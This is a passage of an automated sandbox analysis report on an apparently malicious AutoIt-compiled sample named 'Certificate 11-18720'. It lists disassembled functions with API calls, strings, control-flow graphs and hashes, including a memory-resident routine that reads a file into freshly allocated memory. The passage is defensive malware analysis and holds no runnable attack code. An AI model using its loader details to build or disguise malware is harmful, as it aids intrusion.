                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                    • API String ID: 2641332412-570651680
                                                                                    • Opcode ID: 6d331953b344bc1c6502b4aeb4dabacee554fda3a51582617a368b7ee31a77f5
                                                                                    • Instruction ID: 88f3be15405b6b4b1cc37bdddb2ef1997ac3cc2514e94bdf178805af8095209e
                                                                                    • Opcode Fuzzy Hash: 6d331953b344bc1c6502b4aeb4dabacee554fda3a51582617a368b7ee31a77f5
                                                                                    • Instruction Fuzzy Hash: 6562B270504341DFDB24DF64C88AFAA7BE6BF85304F14496EF9868B292DB71D844CB92
                                                                                    Function 005F5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___createFile.LIBCMT ref: 005F5EC3
                                                                                    • ___createFile.LIBCMT ref: 005F5F04
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 005F5F2D
                                                                                    • __dosmaperr.LIBCMT ref: 005F5F34
                                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 005F5F47
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 005F5F6A
                                                                                    • __dosmaperr.LIBCMT ref: 005F5F73
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 005F5F7C
                                                                                    • __set_osfhnd.LIBCMT ref: 005F5FAC
                                                                                    • __lseeki64_nolock.LIBCMT ref: 005F6016
                                                                                    • __close_nolock.LIBCMT ref: 005F603C
                                                                                    • __chsize_nolock.LIBCMT ref: 005F606C
                                                                                    • __lseeki64_nolock.LIBCMT ref: 005F607E
                                                                                    • __lseeki64_nolock.LIBCMT ref: 005F6176
                                                                                    • __lseeki64_nolock.LIBCMT ref: 005F618B
                                                                                    • __close_nolock.LIBCMT ref: 005F61EB
                                                                                      • Part of subcall function 005EEA9C: CloseHandle.KERNELBASE(00000000,0066EEF4,00000000,?,005F6041,0066EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 005EEAEC
                                                                                      • Part of subcall function 005EEA9C: GetLastError.KERNEL32(?,005F6041,0066EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 005EEAF6
                                                                                      • Part of subcall function 005EEA9C: __free_osfhnd.LIBCMT ref: 005EEB03
                                                                                      • Part of subcall function 005EEA9C: __dosmaperr.LIBCMT ref: 005EEB25
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    • __lseeki64_nolock.LIBCMT ref: 005F620D
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 005F6342
                                                                                    • ___createFile.LIBCMT ref: 005F6361
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 005F636E
                                                                                    • __dosmaperr.LIBCMT ref: 005F6375
                                                                                    • __free_osfhnd.LIBCMT ref: 005F6395
                                                                                    • __invoke_watson.LIBCMT ref: 005F63C3
                                                                                    • __wsopen_helper.LIBCMT ref: 005F63DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                    • String ID: @
                                                                                    • API String ID: 3896587723-2766056989
                                                                                    • Opcode ID: 01fd1cfbb8215dc8fc2d4f196c0cad09a9d4c788d5e279ac67bec9e937b3610b
                                                                                    • Instruction ID: 0c3deff3f4b643cc57a32171ac929ca546785e6c076f1ced33e908c1e67541fe
                                                                                    • Opcode Fuzzy Hash: 01fd1cfbb8215dc8fc2d4f196c0cad09a9d4c788d5e279ac67bec9e937b3610b
                                                                                    • Instruction Fuzzy Hash: 2D22337190060EAFEB299F68CC49BBD7F65FB41310F244668E7619B2E1D63D8E40C791
                                                                                    Function 0060FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _wcscpy.LIBCMT ref: 0060FA96
                                                                                    • _wcschr.LIBCMT ref: 0060FAA4
                                                                                    • _wcscpy.LIBCMT ref: 0060FABB
                                                                                    • _wcscat.LIBCMT ref: 0060FACA
                                                                                    • _wcscat.LIBCMT ref: 0060FAE8
                                                                                    • _wcscpy.LIBCMT ref: 0060FB09
                                                                                    • __wsplitpath.LIBCMT ref: 0060FBE6
                                                                                    • _wcscpy.LIBCMT ref: 0060FC0B
                                                                                    • _wcscpy.LIBCMT ref: 0060FC1D
                                                                                    • _wcscpy.LIBCMT ref: 0060FC32
                                                                                    • _wcscat.LIBCMT ref: 0060FC47
                                                                                    • _wcscat.LIBCMT ref: 0060FC59
                                                                                    • _wcscat.LIBCMT ref: 0060FC6E
                                                                                      • Part of subcall function 0060BFA4: _wcscmp.LIBCMT ref: 0060C03E
                                                                                      • Part of subcall function 0060BFA4: __wsplitpath.LIBCMT ref: 0060C083
                                                                                      • Part of subcall function 0060BFA4: _wcscpy.LIBCMT ref: 0060C096
                                                                                      • Part of subcall function 0060BFA4: _wcscat.LIBCMT ref: 0060C0A9
                                                                                      • Part of subcall function 0060BFA4: __wsplitpath.LIBCMT ref: 0060C0CE
                                                                                      • Part of subcall function 0060BFA4: _wcscat.LIBCMT ref: 0060C0E4
                                                                                      • Part of subcall function 0060BFA4: _wcscat.LIBCMT ref: 0060C0F7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$t2g
                                                                                    • API String ID: 2955681530-1606328850
                                                                                    • Opcode ID: 9736e5e9321007058756d4b246f9e165d26f97980ef5011d2c4a50e49d30a614
                                                                                    • Instruction ID: e077aeb1c7203293d62ef4472340c56c2d9670034864ca711a3e6a300c896524
                                                                                    • Opcode Fuzzy Hash: 9736e5e9321007058756d4b246f9e165d26f97980ef5011d2c4a50e49d30a614
                                                                                    • Instruction Fuzzy Hash: 7291AF72504246AFDB24EB54C859F9BB7E9BF84300F04482DF98997292DB70EA44CB92
                                                                                    Function 005C3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 005C3F86
                                                                                    • RegisterClassExW.USER32(00000030), ref: 005C3FB0
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005C3FC1
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 005C3FDE
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005C3FEE
                                                                                    • LoadIconW.USER32(000000A9), ref: 005C4004
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005C4013
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915
                                                                                    • Opcode ID: fe089a2f18cb4d875ab5e8d820e593af45b7f5fb78e34a79255a0a8eeda337d1
                                                                                    • Instruction ID: 3e96916236e724f066ae0dd444d73786ded39600ef47df5004195cfcfdb42928
                                                                                    • Opcode Fuzzy Hash: fe089a2f18cb4d875ab5e8d820e593af45b7f5fb78e34a79255a0a8eeda337d1
                                                                                    • Instruction Fuzzy Hash: 1E21E5B5D00218AFDB00DFA4EC89BCDBFBAFB0A700F10521AF511AA2A0D7B505858F90
                                                                                    Function 0060BFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0060BDB4: __time64.LIBCMT ref: 0060BDBE
                                                                                      • Part of subcall function 005C4517: _fseek.LIBCMT ref: 005C452F
                                                                                    • __wsplitpath.LIBCMT ref: 0060C083
                                                                                      • Part of subcall function 005E1DFC: __wsplitpath_helper.LIBCMT ref: 005E1E3C
                                                                                    • _wcscpy.LIBCMT ref: 0060C096
                                                                                    • _wcscat.LIBCMT ref: 0060C0A9
                                                                                    • __wsplitpath.LIBCMT ref: 0060C0CE
                                                                                    • _wcscat.LIBCMT ref: 0060C0E4
                                                                                    • _wcscat.LIBCMT ref: 0060C0F7
                                                                                    • _wcscmp.LIBCMT ref: 0060C03E
                                                                                      • Part of subcall function 0060C56D: _wcscmp.LIBCMT ref: 0060C65D
                                                                                      • Part of subcall function 0060C56D: _wcscmp.LIBCMT ref: 0060C670
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0060C2A1
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0060C338
                                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0060C34E
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0060C35F
                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0060C371
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 2378138488-0
                                                                                    • Opcode ID: 4ce748d9c08a985fbc283beb1c2128150129a9136019886c1a510ba1fba8e406
                                                                                    • Instruction ID: 7bc05acc1b28801c1d9076ce38eb616e6f26f15d317256910911729285afde9c
                                                                                    • Opcode Fuzzy Hash: 4ce748d9c08a985fbc283beb1c2128150129a9136019886c1a510ba1fba8e406
                                                                                    • Instruction Fuzzy Hash: 65C16CB1D40119AFCF25DF95CC85EDEBBBDAF89310F1081AAF609E6181DB709A448F61
                                                                                    Function 005C3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 957 5c3742-5c3762 959 5c3764-5c3767 957->959 960 5c37c2-5c37c4 957->960 961 5c37c8 959->961 962 5c3769-5c3770 959->962 960->959 963 5c37c6 960->963 967 5c37ce-5c37d1 961->967 968 631e00-631e2e call 5c2ff6 call 5de312 961->968 964 5c382c-5c3834 PostQuitMessage 962->964 965 5c3776-5c377b 962->965 966 5c37ab-5c37b3 DefWindowProcW 963->966 972 5c37f2-5c37f4 964->972 970 631e88-631e9c call 604ddd 965->970 971 5c3781-5c3783 965->971 973 5c37b9-5c37bf 966->973 974 5c37f6-5c381d SetTimer RegisterWindowMessageW 967->974 975 5c37d3-5c37d4 967->975 1002 631e33-631e3a 968->1002 970->972 996 631ea2 970->996 977 5c3789-5c378e 971->977 978 5c3836-5c3840 call 5deb83 971->978 972->973 974->972 979 5c381f-5c382a CreatePopupMenu 974->979 981 631da3-631da6 975->981 982 5c37da-5c37ed KillTimer call 5c3847 call 5c390f 975->982 985 5c3794-5c3799 977->985 986 631e6d-631e74 977->986 997 5c3845 978->997 979->972 989 631da8-631daa 981->989 990 631ddc-631dfb MoveWindow 981->990 982->972 994 5c379f-5c37a5 985->994 995 631e58-631e68 call 6055bd 985->995 986->966 992 631e7a-631e83 call 5fa5f3 986->992 998 631dcb-631dd7 SetFocus 989->998 999 631dac-631daf 989->999 990->972 992->966 994->966 994->1002 995->972 996->966 997->972 998->972 999->994 1003 631db5-631dc6 call 5c2ff6 999->1003 1002->966 1007 631e40-631e53 call 5c3847 call 5c4ffc 1002->1007 1003->972 1007->966
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 005C37B3
                                                                                    • KillTimer.USER32(?,00000001), ref: 005C37DD
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005C3800
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005C380B
                                                                                    • CreatePopupMenu.USER32 ref: 005C381F
                                                                                    • PostQuitMessage.USER32(00000000), ref: 005C382E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                    • String ID: TaskbarCreated
                                                                                    • API String ID: 129472671-2362178303
                                                                                    • Opcode ID: 6dfb82406fa26b76922598bc98104e34c2913e7332038f2d851d2a7ab5c8e7cb
                                                                                    • Instruction ID: 666d2094dbf9616b607d96473b598c1b013ef9538041f06917f730ccce993483
                                                                                    • Opcode Fuzzy Hash: 6dfb82406fa26b76922598bc98104e34c2913e7332038f2d851d2a7ab5c8e7cb
                                                                                    • Instruction Fuzzy Hash: 44413BF950414E6FDB146FA89C4EFBA3EDBFB46300F00961DFA029A191CB619F429761
                                                                                    Function 005C3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 005C3E79
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 005C3E88
                                                                                    • LoadIconW.USER32(00000063), ref: 005C3E9E
                                                                                    • LoadIconW.USER32(000000A4), ref: 005C3EB0
                                                                                    • LoadIconW.USER32(000000A2), ref: 005C3EC2
                                                                                      • Part of subcall function 005C4024: LoadImageW.USER32(005C0000,00000063,00000001,00000010,00000010,00000000), ref: 005C4048
                                                                                    • RegisterClassExW.USER32(?), ref: 005C3F30
                                                                                      • Part of subcall function 005C3F53: GetSysColorBrush.USER32(0000000F), ref: 005C3F86
                                                                                      • Part of subcall function 005C3F53: RegisterClassExW.USER32(00000030), ref: 005C3FB0
                                                                                      • Part of subcall function 005C3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005C3FC1
                                                                                      • Part of subcall function 005C3F53: InitCommonControlsEx.COMCTL32(?), ref: 005C3FDE
                                                                                      • Part of subcall function 005C3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005C3FEE
                                                                                      • Part of subcall function 005C3F53: LoadIconW.USER32(000000A9), ref: 005C4004
                                                                                      • Part of subcall function 005C3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005C4013
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                    • String ID: #$0$AutoIt v3
                                                                                    • API String ID: 423443420-4155596026
                                                                                    • Opcode ID: e4fcade3cd2cff484da2e6fe800fffcb6b279b9042d157a804999a89d35a2c39
                                                                                    • Instruction ID: 3b4fd54216c4c0dbacd769bd9cc31ad3fb598dfb0f166bf078c55732719ac2e7
                                                                                    • Opcode Fuzzy Hash: e4fcade3cd2cff484da2e6fe800fffcb6b279b9042d157a804999a89d35a2c39
                                                                                    • Instruction Fuzzy Hash: 032131B4D00304BFDB10DFA9EC49A99BFFAFB4A710F10621AE614AA3A0D77546458F91
                                                                                    Function 00F46608 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1021 f46608-f466b6 call f43fe8 1024 f466bd-f466e3 call f47518 CreateFileW 1021->1024 1027 f466e5 1024->1027 1028 f466ea-f466fa 1024->1028 1029 f46835-f46839 1027->1029 1035 f46701-f4671b VirtualAlloc 1028->1035 1036 f466fc 1028->1036 1031 f4687b-f4687e 1029->1031 1032 f4683b-f4683f 1029->1032 1037 f46881-f46888 1031->1037 1033 f46841-f46844 1032->1033 1034 f4684b-f4684f 1032->1034 1033->1034 1038 f46851-f4685b 1034->1038 1039 f4685f-f46863 1034->1039 1040 f46722-f46739 ReadFile 1035->1040 1041 f4671d 1035->1041 1036->1029 1042 f468dd-f468f2 1037->1042 1043 f4688a-f46895 1037->1043 1038->1039 1046 f46865-f4686f 1039->1046 1047 f46873 1039->1047 1048 f46740-f46780 VirtualAlloc 1040->1048 1049 f4673b 1040->1049 1041->1029 1044 f468f4-f468ff VirtualFree 1042->1044 1045 f46902-f4690a 1042->1045 1050 f46897 1043->1050 1051 f46899-f468a5 1043->1051 1044->1045 1046->1047 1047->1031 1052 f46787-f467a2 call f47768 1048->1052 1053 f46782 1048->1053 1049->1029 1050->1042 1054 f468a7-f468b7 1051->1054 1055 f468b9-f468c5 1051->1055 1061 f467ad-f467b7 1052->1061 1053->1029 1056 f468db 1054->1056 1057 f468c7-f468d0 1055->1057 1058 f468d2-f468d8 1055->1058 1056->1037 1057->1056 1058->1056 1062 f467b9-f467e8 call f47768 1061->1062 1063 f467ea-f467fe call f47578 1061->1063 1062->1061 1069 f46800 1063->1069 1070 f46802-f46806 1063->1070 1069->1029 1071 f46812-f46816 1070->1071 1072 f46808-f4680c CloseHandle 1070->1072 1073 f46826-f4682f 1071->1073 1074 f46818-f46823 VirtualFree 1071->1074 1072->1071 1073->1024 1073->1029 1074->1073
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F466D9
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F468FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileFreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 204039940-0
                                                                                    • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                    • Instruction ID: 77ab07cf31b00a93bc767af8e3103d20878bc4f53a84df3eacfd68875c969503
                                                                                    • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                    • Instruction Fuzzy Hash: 97A10675E00209EBDB14CFA4C894BEEBBB5BF49314F208159E901BB280D7799A85DB61
                                                                                    Function 005C49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1130 5c49fb-5c4a25 call 5cbcce RegOpenKeyExW 1133 5c4a2b-5c4a2f 1130->1133 1134 6341cc-6341e3 RegQueryValueExW 1130->1134 1135 634246-63424f RegCloseKey 1134->1135 1136 6341e5-634222 call 5df4ea call 5c47b7 RegQueryValueExW 1134->1136 1141 634224-63423b call 5c6a63 1136->1141 1142 63423d-634245 call 5c47e2 1136->1142 1141->1142 1142->1135
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 005C4A1D
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006341DB
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0063421A
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00634249
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue$CloseOpen
                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                    • API String ID: 1586453840-614718249
                                                                                    • Opcode ID: 12d56b723f3a70cdcc26df1b7d4cbad4dd0f52124bbb166683b8b822fc9e5151
                                                                                    • Instruction ID: d6107574c970af799230a80791a64bc3b6352d59a7ec36d496aee35659580d78
                                                                                    • Opcode Fuzzy Hash: 12d56b723f3a70cdcc26df1b7d4cbad4dd0f52124bbb166683b8b822fc9e5151
                                                                                    • Instruction Fuzzy Hash: 16116D75A00109BFEB14ABA4CD8AEFF7BADEF05744F001069B506E7191EA70AE06DB50
                                                                                    Function 005C36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1157 5c36b8-5c3728 CreateWindowExW * 2 ShowWindow * 2
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005C36E6
                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005C3707
                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,005C3AA3,?), ref: 005C371B
                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,005C3AA3,?), ref: 005C3724
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateShow
                                                                                    • String ID: AutoIt v3$edit
                                                                                    • API String ID: 1584632944-3779509399
                                                                                    • Opcode ID: af96cd977b4dab5f15cb46376486748a14671960682a2a5948d871e489cd2e17
                                                                                    • Instruction ID: 507d1663e3cca76f485e12428bc00b0afe3127a584ca1dc2249ed09a4a8e3150
                                                                                    • Opcode Fuzzy Hash: af96cd977b4dab5f15cb46376486748a14671960682a2a5948d871e489cd2e17
                                                                                    • Instruction Fuzzy Hash: A3F0DA759402D47AE7315B57AC08E672E7FD7C7F60F01111ABA04AA1B0C9650896EBB1
                                                                                    Function 00F46398 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
